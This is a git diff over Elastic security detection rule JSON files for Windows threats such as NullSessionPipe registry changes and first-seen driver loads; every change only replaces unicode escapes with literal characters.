a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_104.json +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_104.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_105.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_105.json index e139735469c..51e54870d50 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_105.json +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_105.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_106.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_106.json index c22d53c8f76..b0700225ddc 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_106.json +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_106.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_107.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_107.json index 25d1e25ef6f..2baf7cb8b42 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_107.json +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_107.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_108.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_108.json index f0dd42be96e..09db33be226 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_108.json +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_108.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_2.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_2.json index 32bc5b5ddb1..0440fbe91fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_3.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_3.json index f2cda7d6e33..6bcb9cd0002 100644 --- a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_3.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_4.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_4.json index fae05faedf3..fd42822b678 100644 --- a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_4.json +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_4.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_5.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_5.json index 07ba3f79d42..bc33c12ebab 100644 --- a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_5.json +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_5.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_103.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_103.json index 6875e5de65c..7b3bbb2499d 100644 --- a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_103.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "NullSessionPipe Registry Modification", - "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) \u003e 0\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_104.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_104.json index 599fecb25ba..d103fe61e94 100644 --- a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_104.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "NullSessionPipe Registry Modification", - "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) \u003e 0\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_105.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_105.json index 1e89de8c677..f464ddf44da 100644 --- a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_105.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "NullSessionPipe Registry Modification", - "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) \u003e 0\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_106.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_106.json index a08659d7ac4..4f06722b016 100644 --- a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_106.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "NullSessionPipe Registry Modification", - "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) \u003e 0\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_104.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_104.json index 117584de0dd..cd715c62777 100644 --- a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_104.json @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_105.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_105.json index 02db8026916..22a1437d20e 100644 --- a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_105.json @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_106.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_106.json index a1a6405542a..f073f68957b 100644 --- a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_106.json +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_106.json @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_107.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_107.json index e81b6fd628e..276805cbf71 100644 --- a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_107.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_103.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_103.json index 771082f613f..58300f726ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_103.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_104.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_104.json index ce7bbdf13c7..249474e07a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_104.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_105.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_105.json index 76f5a401eb3..f119663e037 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_105.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_106.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_106.json index 4ee296a2191..14ac4f50a06 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_106.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_106.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_107.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_107.json index 399c48d425c..32a6b6fbf7d 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_107.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_107.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_1.json b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_1.json index 5bfb83cd23f..f9176cdadda 100644 --- a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_102.json b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_102.json index 02ed414e2cf..88e31fb8cf4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_2.json b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_2.json index e7b70dfc2f8..8b2a67d2ec1 100644 --- a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_2.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_2.json index c3e7376b74c..18d5b01d72a 100644 --- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_2.json +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_2.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_3.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_3.json index 56f1d5683bc..37786bfdf7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_3.json +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_3.json @@ -16,7 +16,7 @@ "dll.pe.original_file_name", "dll.code_signature.subject_name" ], - "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using 